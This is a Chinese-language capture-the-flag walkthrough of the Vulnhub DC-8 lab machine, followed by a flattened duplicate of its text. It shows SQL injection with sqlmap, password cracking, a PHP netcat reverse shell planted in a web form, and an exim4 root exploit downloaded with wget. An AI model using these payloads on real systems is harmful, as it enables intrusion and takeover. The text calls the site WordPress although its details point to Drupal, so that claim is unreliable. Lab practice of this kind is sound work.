vulnhub DC-8靶机实战
字数 1469 2025-08-11 21:26:12

DC-8 靶机渗透测试实战教程

0X00 靶机概述

DC-8 是 Vulnhub 上的一个渗透测试靶机,难度中等,主要考察 SQL 注入、Web 应用漏洞利用和 Linux 提权等技术。

0X01 环境部署

  1. 下载靶机镜像:

    • 官方下载地址:https://www.vulnhub.com/entry/dc-8,367/

  2. 网络配置:

    • 将 Kali Linux 和 DC-8 靶机都设置为 NAT 模式
    • 确保两者在同一网络段

0X02 信息收集

1. 主机发现

使用 arp-scan 发现目标 IP:

arp-scan -l
  • Kali IP: 192.168.190.128
  • DC-8 IP: 192.168.190.136

2. 端口扫描

使用 Nmap 进行快速扫描:

nmap -sS 192.168.190.136

发现开放了 80 端口(HTTP 服务)

3. 目录扫描

使用 dirsearch 扫描网站目录:

python3 dirsearch.py -u http://192.168.190.136/

发现重要后台登录页面:

http://192.168.190.136/wordy/wp-login.php

4. 网站识别

通过浏览网站发现这是一个 WordPress 站点

0X03 获取 Shell

1. 漏洞发现

发现可能存在 SQL 注入的 URL:

http://192.168.190.136/?nid=1

使用 sqlmap 进行测试:

sqlmap -u http://192.168.190.136/?nid=1 --dbs

确认存在 SQL 注入漏洞

2. 获取凭据

通过 SQL 注入获取用户凭据:

  • 用户名:john
  • 密码哈希:\(S\)D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTdCahZeRXDdJwlsX

使用 John the Ripper 破解密码:

echo '$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTdCahZeRXDdJwlsX' > hash.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

成功破解:

  • 密码:turtle

3. 登录后台

使用获取的凭据登录 WordPress 后台:

http://192.168.190.136/wordy/wp-login.php

用户名:john
密码:turtle

4. 漏洞利用

在后台寻找可利用的功能点:

  1. 进入 Add content → Webform
  2. 选择 Find content → WebForm → Form setting
  3. 插入 PHP 反弹 shell 代码:
<?php system("nc -e /bin/bash 192.168.190.128 6789"); ?>

5. 获取反弹 shell

在 Kali 上设置监听:

nc -lvvp 6789

触发 Webform 提交,获取反弹 shell

6. 升级交互式 shell

在获得的 shell 中升级为完全交互式 shell:

python -c 'import pty;pty.spawn("/bin/bash")'

0X04 权限提升

1. 当前权限确认

whoami

输出:www-data

2. SUID 提权尝试

查找具有 SUID 权限的可执行文件:

find / -perm -u=s -type f 2>/dev/null

发现 exim4 可能可利用

3. 利用 exim4 提权

检查 exim4 版本:

exim4 --version

在 Exploit-DB 查找相关漏洞:

  • 可利用的 exp:https://www.exploit-db.com/exploits/46996

下载并准备 exp:

  1. 在 Kali 上启动 HTTP 服务:
python3 -m http.server 8000
  1. 在靶机上下载 exp:
wget http://192.168.190.128:8000/46996.sh
  1. 修改文件格式(重要):
vi 46996.sh
:set ff=unix
:wq
  1. 赋予执行权限并运行:
chmod 777 46996.sh
./46996.sh -m netcat

4. 获取 root 权限

提权成功后:

cd /root
ls
cat flag.txt

0X05 总结

  1. 信息收集阶段

    • 使用 arp-scan 和 nmap 发现目标
    • 使用 dirsearch 扫描网站目录结构

  2. 漏洞利用阶段

    • 发现并利用 SQL 注入获取后台凭据
    • 使用 John the Ripper 破解密码哈希
    • 通过 WordPress 后台上传 PHP 反弹 shell

  3. 权限提升阶段

    • 查找 SUID 可执行文件
    • 利用 exim4 漏洞进行提权
    • 注意 exp 文件格式转换(DOS 到 UNIX)

  4. 关键点

    • SQL 注入点的发现和利用
    • 密码哈希的破解
    • Web 应用功能点的利用
    • Linux 提权技术(SUID 和 exim4 漏洞)

通过这个靶机,可以学习到从信息收集到获取系统完整控制权的完整渗透测试流程。

DC-8 靶机渗透测试实战教程 0X00 靶机概述 DC-8 是 Vulnhub 上的一个渗透测试靶机,难度中等,主要考察 SQL 注入、Web 应用漏洞利用和 Linux 提权等技术。 0X01 环境部署 下载靶机镜像: 官方下载地址:https://www.vulnhub.com/entry/dc-8,367/ 网络配置: 将 Kali Linux 和 DC-8 靶机都设置为 NAT 模式 确保两者在同一网络段 0X02 信息收集 1. 主机发现 使用 arp-scan 发现目标 IP: Kali IP: 192.168.190.128 DC-8 IP: 192.168.190.136 2. 端口扫描 使用 Nmap 进行快速扫描: 发现开放了 80 端口(HTTP 服务) 3. 目录扫描 使用 dirsearch 扫描网站目录: 发现重要后台登录页面: 4. 网站识别 通过浏览网站发现这是一个 WordPress 站点 0X03 获取 Shell 1. 漏洞发现 发现可能存在 SQL 注入的 URL: 使用 sqlmap 进行测试: 确认存在 SQL 注入漏洞 2. 获取凭据 通过 SQL 注入获取用户凭据: 用户名:john 密码哈希:$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTdCahZeRXDdJwlsX 使用 John the Ripper 破解密码: 成功破解: 密码:turtle 3. 登录后台 使用获取的凭据登录 WordPress 后台: 用户名:john 密码:turtle 4. 漏洞利用 在后台寻找可利用的功能点: 进入 Add content → Webform 选择 Find content → WebForm → Form setting 插入 PHP 反弹 shell 代码: 5. 获取反弹 shell 在 Kali 上设置监听: 触发 Webform 提交,获取反弹 shell 6. 升级交互式 shell 在获得的 shell 中升级为完全交互式 shell: 0X04 权限提升 1. 当前权限确认 输出:www-data 2. SUID 提权尝试 查找具有 SUID 权限的可执行文件: 发现 exim4 可能可利用 3. 利用 exim4 提权 检查 exim4 版本: 在 Exploit-DB 查找相关漏洞: 可利用的 exp:https://www.exploit-db.com/exploits/46996 下载并准备 exp: 在 Kali 上启动 HTTP 服务: 在靶机上下载 exp: 修改文件格式(重要): 赋予执行权限并运行: 4. 获取 root 权限 提权成功后: 0X05 总结 信息收集阶段 : 使用 arp-scan 和 nmap 发现目标 使用 dirsearch 扫描网站目录结构 漏洞利用阶段 : 发现并利用 SQL 注入获取后台凭据 使用 John the Ripper 破解密码哈希 通过 WordPress 后台上传 PHP 反弹 shell 权限提升阶段 : 查找 SUID 可执行文件 利用 exim4 漏洞进行提权 注意 exp 文件格式转换(DOS 到 UNIX) 关键点 : SQL 注入点的发现和利用 密码哈希的破解 Web 应用功能点的利用 Linux 提权技术(SUID 和 exim4 漏洞) 通过这个靶机,可以学习到从信息收集到获取系统完整控制权的完整渗透测试流程。